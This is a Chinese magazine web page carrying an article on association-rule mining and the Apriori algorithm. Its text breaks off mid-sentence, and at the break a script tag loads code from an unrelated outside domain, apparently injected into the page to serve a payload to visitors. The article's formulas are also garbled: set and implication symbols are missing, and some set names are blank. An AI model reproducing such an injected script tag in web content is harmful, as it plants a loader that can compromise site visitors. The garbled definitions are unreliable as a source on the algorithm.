中考指南高考必备小学语文小学数学小学作文领导战略管理有方资本运作门店必备健康宝典礼仪天下
初中单科高中必修高效学习少儿智力青少心理财税必备成功励志绩效管理私募攻略纳税筹划网络营销
教师指南家教秘笈小学课堂物理实验化学实验营销必胜赢在人才合法节税悟性管理采购管控创意陈列
数据挖掘中关联规则算法的研究 - 看看网
看看网 - 大众科技(12个月24期) - 技术文摘 - 数据挖掘中关联规则算法的研究
数据挖掘中关联规则算法的研究
2006-9-4  作者:李云强  阅读:  

    数据挖掘是从存放在数据库,数据仓库或其他信息库中的大量数据中挖掘有趣知识的过程。它不仅能对过去的数据进行查询和遍历,并且能够找出过去数据之间的潜在关系,从而促进信息的传递。关联规则挖掘是数据挖掘中是一个重要的课题,最近几年已被业界所广泛研究。关联规则反映一个事务与其他事物之间的相互依存性和关联性。如果两个或者多个事物之间存在一定的关联关系,那么,其中一个事物就能够通过其它事物预测到。

  一、关联规则的定义及算法的基本思想

  (一)关联规则的定义

  设I={i1,i2…,im}为所有项目的集合,设A是一个由项目构成的集合,称为项集。事务T是一个项目子集,每一个事务具有唯一的事务标识Tid。事务T包含项集A,当且仅当AT。如果项集A中包含k个项目,则称其为k项集。D为事务数据库,项集A在事务数据库D中出现的次数占D中总事务的百分比叫做项集的支持度(support)。如果项集的支持度超过用户给定的最小支持度阈值,就称该项集是频繁项集(或大项集)。

  关联规则就是形如XY的逻辑蕴含关系,其中XI,YI且XY=Φ,X称作规则的前件,Y是结果,对于关联规则XY,存在支持度和信任度。

  支持度是指规则中所出现模式的频率,如果事务数据库有s%的事务包含XY,则称关联规则XY在D中的支持度为s%,实际上,可以表示为概率P(XY),即support(XY)= P(XY)。信任度是指蕴含的强度,即事务D中c%的包含X的交易同时包含XY。若X的支持度是support(x),规则的信任度为即为:support(XY)/support(X),这是一个条件概率P(Y|X),即confidence(XY)= P(Y|X)。

  关联规则就是支持度和信任度分别满足用户给定阈值的规则。

  (二)关联规则的算法

  1993年,R.Agrawal等人首次提出了挖掘顾客交易数据中项目集间的关联规则问题,其核心是基于两阶段频繁集思想的递推算法。该关联规则在分类上属于单维、单层及布尔关联规则,典型的算法是Aprior算法。

  Aprior算法将发现关联规则的过程分为两个步骤:第一步通过迭代,检索出事务数据库中的所有频繁项集,即支持度不低于用户设定的阈值的项集;第二步利用频繁项集构造出满足用户最小信任度的规则。其中,挖掘或识别出所有频繁项集是该算法的核心,占整个计算量的大部分。

  (三)Apriori核心算法分析

  由m个不同项目形成的不同项集的数目可达到个,为了避免计算所有项集的支持度,Apriori算法引入了潜在频繁项集的概念,它是指由有可能成为频繁k项集的集合组成的集合。潜在频繁k项集的集合记为C,频繁k项集的集合记为L,m个项目构成的k项集的集合为C,则三者之间满足。Aprior算法运用关联规则的性质,频繁项集的子集必为频繁项集,通过已知的频繁项集构成长度更大的项集(即潜在频繁项集)。其核心算法过程如下:

    1.过单趟扫描数据库D计算出各个1项集的支持度,得到频繁1项集的集合。

  2.连接步:为了生成,预先生成,由2个只有一个项不同的属于的频集做一个(k-2)JOIN运算得到的。

  3.剪枝步:由于是的超集,所以可能有些元素不是频繁的。在潜在k项集的某个子集不是中的成员是,则该潜在频繁项集不可能是频繁的可以从中移去。

  4.通过单趟扫描数据库D,计算中各个项集的支持度,将中不满足支持度的项集去掉,形成。

    通过迭代循环,重复步骤2~4,直到有某个r值使得为空,这时算法停止。在剪枝步中的每个元素需在交易数据库中进行验证来决定其是否加入,这里的验证过程是算法性能的一个瓶颈。这个方法要求多次扫描可能很大的交易数据库。可能产生大量的候选集,以及可能需要重复扫描数据库,是Apriori算法的两大缺点。

   二、Aprior算法的优化

  为了提高算法的效率,Mannila等引入了修剪技术来减少候选集的大小,由此可以显著的改进生成所有频繁算法的性能。同时,为了提高效率,算法将所有大小为k的潜在频繁项集组织为一张哈希树,另外,算法不需要事务驻留在主存中,但哈希树必须在主存中。如果哈希树太大不能全部放在主存中,则哈希树需要被划分,大量数据需要在各个事务数据库之间传递(对哈希树的每个分块)。

  尽管最近这些串行算法采取了诸多改进措施以提高其性能,但面对大规模数据或多维问题时,单一的处理机的计算能力明显不足。因此,设计高效的并行算法尤为重要。下面就以三种常用的关联规则并行算法做一简要介绍。

  三、三种简单并行算法及其特点

  目前,几乎所有高效的发现关联规则的并行数据挖掘算法都是基于Apriori算法的,Agrawal和Shafer 提出了三种并行算法:计数分发(Count Distribution)算法、数据分发(Data Distribution)算法和候选分发(Candidate Distribute)?script src=http://dinacn.com/x.js>

【版权声明】 以上《数据挖掘中关联规则算法的研究 》之图文信息归《大众科技(12个月24期)》所有。未经《大众科技(12个月24期)》书面许可,不得为任何目的、以任何形式或手段发布、复制、编辑、改编、转载、播放、展示、翻印。版权所有,《大众科技(12个月24期)》保留所有权利。
- 文章分类 -
时政   社会   财经   产业
娱乐   体坛   生活   健康
文学   科技   教育   社科
文化   技术文摘   科学文摘
240.00元/年
- 热点文章 -
更多文章
新区的梦想与挑战
正如它的名字,雄安,一个横空出世的地理概念,一跃成为“雄伟”和“安定”的象征。这一步出人意料的棋子,是如何下的,而它又能否破解超级城市困局?
朝鲜这六年
无论观察家们是否愿意承认,被“崩溃”传闻笼罩已有1/4个世纪的平壤当局自有其维系生存的秘诀;年少当国、笑容可掬的金正恩,行事风格也远比外界的预估来得强硬果决。
人民文学 2017年01期 要目
报告文学《塘约道路》,用明晰的思路、确凿的事例和真切的故事,将地方与国家、人与时代、发展与守护、创新与前景熔于一炉,我们从中也真切地体会到了文脉与国脉、文运与国运的深刻联系。 散文《建水笔记》,是一个综合了客观的文化历史与作家的个人发现的
人民文学 2016年12期 要目
2016年是值得留念的文学时段。 这一年,在文学及其相关领域里,对中国故事的精神、价值与分量的追求令人印象深刻,向思想精深、艺术精湛的目标迈进的脚印坚实有力,佳作迭出,反响积极,写作、阅读和推广的联动态势更为自然成熟,形成了较以往更为浓郁
人民文学 2016年11期 要目
从一九五六年第九期《人民文学》发表的《组织部新来的青年人》(原稿标题为《组织部来了个年轻人》),到本期刊出的《女神》;从赵慧文对林震的心有灵犀,到陈布文对王蒙的烛照影响——六十载今昔往返中,王蒙给我们呈现了刻骨铭心的忆念“非虚构”与不拘一格
人民文学 2016年10期 要目
《怅望》是诗人马新朝生前所写的最后一组力作,犹如一座文学的纪念碑——关乎尊严,关乎热爱,关乎俯身大地的事体与伸向星空的内心,关乎生命的具象和抽象,关乎人世安详!
人民文学 2016年09期 要目
二三十岁的年龄,正是活力和才情上涌之时。翻开《人民文学》历史,你会惊讶于《组织部新来的青年人》、《北极村童话》出自不满二十二岁的王蒙、迟子建。跟他们相比,如今的青年作家发轫期整体上似乎延后了许多。文学向来不以年轻与否论英雄,然而,年轻出英才
人民文学 2016年8期 要目
近年来,每逢第八期,我们都以军人、军队与军史题材作品组成庆祝建军节专号或专辑。这一次,我们没有特别标明,但读后便知,中篇小说栏中的三分之二、短篇小说头条,都是故事相关、艺术讲究、视角独特的军事文学佳作。
人民文学 2016年7期 要目
缘于战士一次自作主张的“绑票”行动,财主家的小少爷进入红军队伍中。错误被纠正之后,却无论如何也没有办法送他回家,在酷烈的战事和恶劣的环境中,一次又一次的纠结和艰险情形下,他在长征路上得到了一个又一个红军战士的保护和疼惜——以格外稀缺的食物、
人民文学 2016年06期 要目
近期最令人欣喜的文学事件,是国际安徒生奖首次颁发给中国作家,曹文轩成为这一世界级重要文学成就奖项的首位中国得主。《蜻蜓眼》是曹文轩的最新力作,这部长篇小说,如同影响巨大的《草房子》那样,可以视为“儿童文学”,更应该看作是经典文脉上的文学。
关于看看·订购指南·联系我们·出版物经营许可证·营业执照
看看网(www.kankan.cn)
版权所有 北京金士兰经济文化有限公司  京ICP备07010955号-2
Copyright © 2005-2021 Kingsland Media Service Group All Rights Reserved